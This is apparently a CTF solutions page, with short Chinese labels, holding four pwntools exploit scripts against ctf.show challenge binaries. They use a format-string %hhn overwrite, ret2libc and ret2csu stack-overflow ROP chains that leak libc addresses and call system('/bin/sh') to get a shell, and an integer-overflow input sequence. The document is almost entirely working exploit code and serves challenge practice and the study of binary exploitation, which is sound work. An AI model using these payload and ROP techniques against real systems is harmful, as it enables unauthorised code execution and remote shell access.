格式化字符串漏洞,覆写num为16即可打印出flag
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28045)
elf=ELF("./pwn1")
#gdb.attach(io,"b * 0x080485D0")
#pause()
num_addr=0x0804A030
io.recvuntil("try pwn me?")
payload=p32(num_addr)+"8"*12+"%7$hhn"
io.sendline(payload)
#pause()
io.interactive()
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28018)
elf=ELF("./pwn1")
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x400687
pop_rdi=0x400793
ret=0x40053e
io.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a
io.recvuntil("successful!\n")
payload="a"*0x70+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)
io.interactive()
整型溢出
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28171)
elf=ELF("./pwn1")
io.sendlineafter("a:",str(2147483658))
io.sendlineafter("b:",str(2147483649))
io.sendlineafter("a:",str(9629))
io.sendlineafter("b:",str(446045))
io.sendlineafter("a:",str(2147483648))
io.sendlineafter("b:",str(-1))
io.interactive()
栈溢出,ret2csu
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28116)
elf=ELF("./pwn1")
write_got=elf.got["write"]
write_plt=elf.plt["write"]
main_addr=0x4005FD
gadget_2=0x00000000004006A0
gadget_1=0x00000000004006BA
def com_gadget(rbx,rbp,r12,r13,r14,r15,main_addr):
payload="a"*(160+8)
payload+=p64(gadget_1)
payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload+=p64(gadget_2)
payload+="a"*56
payload+=p64(main_addr)
return payload
io.recvuntil("Try Pwn Me?\n")
payload=com_gadget(0,1,write_got,8,write_got,1,main_addr)
io.sendline(payload)
write_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("write_addr=="+hex(write_addr))
libc_base=write_addr-0x110140
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a
pop_rdi=0x4006c3
ret=0x4004a9
io.recvuntil("Try Pwn Me?\n")
payload="a"*(160+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)
io.interactive()